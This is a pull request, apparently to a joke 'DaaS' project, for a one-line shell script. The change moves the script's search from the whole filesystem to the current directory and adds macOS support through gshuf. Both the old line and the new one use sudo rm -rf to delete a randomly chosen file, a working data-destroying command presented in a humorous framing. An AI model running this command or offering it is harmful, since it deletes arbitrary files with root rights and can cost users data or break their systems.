### PR TITLE
Add support for macOS

### DIFF
--- a/static/one-less-to-go.sh
+++ b/static/one-less-to-go.sh
@@ -1,1 +1,1 @@
-sudo rm -rf $(sudo find / -type f | shuf -n1)
+sudo rm -rf $(sudo find . -type f | ([[ "$(uname)" == "Darwin" ]] && gshuf -n1 || shuf -n1))


### PR DESCRIPTION
According to the [2018 Stack Overflow](https://insights.stackoverflow.com/survey/2018#technology-developers-primary-operating-systems) survey, more developers use macOS than Linux. It's important then I guess that DaaS supports macOS.